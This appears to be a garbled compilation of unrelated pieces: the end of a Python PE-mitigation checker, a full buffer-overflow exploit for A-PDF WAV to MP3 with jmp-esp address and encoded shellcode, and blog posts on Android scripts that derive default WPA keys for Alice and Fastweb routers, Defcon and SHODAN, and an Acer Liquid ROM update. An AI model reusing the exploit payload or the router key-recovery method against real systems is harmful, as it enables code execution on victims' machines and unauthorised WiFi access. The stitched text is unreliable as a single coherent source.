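    legacy = build_minimal_pe(0x0000)     # opts into nothing
    for name, img in (("hardened", hardened), ("legacy", legacy)):
        r = mitigation_report(img)
        print(name,
              "ASLR" if r["DYNAMIC_BASE"] else "no ASLR",
              "DEP" if r["NX_COMPAT"] else "no DEP")
```

To audit a real module, read the file in binary mode and pass its bytes to mitigation_report(). Note that SafeSEH is not expressed in this field: the handler table lives in the load config directory (IMAGE_LOAD_CONFIG_DIRECTORY), so a full review has to parse that directory as well.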
# http://www.exploit-db.com/exploits/14681/
#################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
buff = "\x41" * 4128
# 76bc6d53: jmp esp in user32.dll, written little endian
eip = "\x53\x6d\xbc\x76"
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
             "\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
             "\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
             "\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
             "\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
             "\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
             "\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
             "\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
             "\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
             "\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
             "\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
             "\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
             "\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
             "\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
             "\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
             "\xc8\x29\x9e")
sploit = buff + eip + shellcode
try:
    # No file checking, any file extension works... (.xyz .foo .abc)
    f1 = open("Dr_IDEs5.wav", "w")
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
Perfect, we’re done! That is what you’re thinking, but the exploit still doesn’t work. Analysing with OllyDbg we notice that only the 17th character of the shellcode ends up in EIP:
In these summer days, away from the usual hassles, I am trying to finish the “ToDoList” I drew up over the winter. I often read interesting things and don’t have the time to apply/test/try them, so I just jot them down and the list inexorably grows.
Among other things, I had promised myself to write two simple scripts to compute the default WPA key of Alice and Fastweb routers, compatible with my Android phone, so as to always carry a little Swiss army knife with me. I had coded something before, but given the many scripts now easily found online I see no reason not to publish an Android-compatible version here.
Requirements
For my scripts to work properly you need:
Root access – essential for changing file permissions
A working adb – essential for transferring the files
Once the environment is ready you need to install busybox, bc and bash on the phone. Android runs on the ARM architecture, so binaries compiled for these embedded systems are required:
Before using the scripts, keep in mind that not all routers are vulnerable; currently only those whose SSID appears in the two lists:
adb remount
adb push fast /sdcard
adb push alice /sdcard
Usage
Take the phone and, with the Astro application, open the script to edit the inputs: the ssid and mac variables for Alice, the input variable for Fastweb.
Then use ConnectBot to get a shell on Android and run the scripts by typing these commands:
su
cd /sdcard
bash fast
bash alice
Demo
Enjoy.
Disclaimer: I do not hold myself responsible in any way for the information described in this article or for the use you may make of it.
Just these days in Las Vegas the 18th Defcon came to an end, an event where the best hackers from all over the world gather and present new attack methodologies. This year’s novelty is without doubt the attack on WPA2, the encryption currently considered the most secure for WiFi networks.
However, I would also like to share this other interesting presentation on SHODAN, a search engine for computers and servers. SHODAN lets you find devices on the Internet such as routers, switches, web servers… in short, a nice wealth of resources! The case studies are very intriguing; one concerns Cisco and is very similar to what I had discussed here.
I spent an afternoon on it, but in the end the result repaid the time spent!
As you know, the official version of Android 2.1 for the Acer Liquid has been released:
The main new features I could appreciate right away are:
- Multitouch working perfectly;
- Picasa integration;
- Automatic contact backup;
- 5 desktops;
- Bluetooth finally working;
- Improved menu, much nicer to look at.
The only sore point will probably be the battery: Eclair (Android 2.1) consumes slightly more than Donut (Android 1.6). Still, the update is a must, so let’s see how to do it.
Installing Eclair Android 2.1
Upgrading to version 2.1 is not a complicated operation, so don’t be scared.
First of all you need to get the ROM directly from Acer’s official site. Once the package is extracted, just run the setup.exe found inside the EUU_Acer_LiquidE_1.100.39_EMEA-GEN1_04.02.02 folder.
Be careful not to connect the phone to the PC’s USB port until this point; wait for the moment you are asked to, as shown in the picture, and only then connect it.
Once you press “Next” all you have to do is wait for the reflash procedure to finish. The phone will reboot with Eclair Android 2.1 ready to use.
Problem with recognising the previous version
If, like me, you started from an Acer_liquid_1.002.03_EMEA_GEN1 ROM (Settings -> About phone -> Build number) and Acer’s utility did not recognise the previous version and would not let you proceed, a few extra steps are needed.
Download this Acer Tool and this Build. Unpack the package and run ACER Download Tool [Single].exe, found in the main directory. Connect the phone and use the Acer Tool to select the build you just downloaded. Click Start and do not disconnect the USB until the procedure has finished.
If everything went well the phone reboots with Eclair Android 2.1. At this point you can keep this build or redo the first step with the official one, since Acer’s utility now recognises the previous version.
Source:
I got all this information from batista70’s excellent forum. The aim of this post was to summarise the main points listed in that thread. Also worth mentioning is the unofficial b70p 2.0 ROM, definitely worth testing given the interesting presentation video.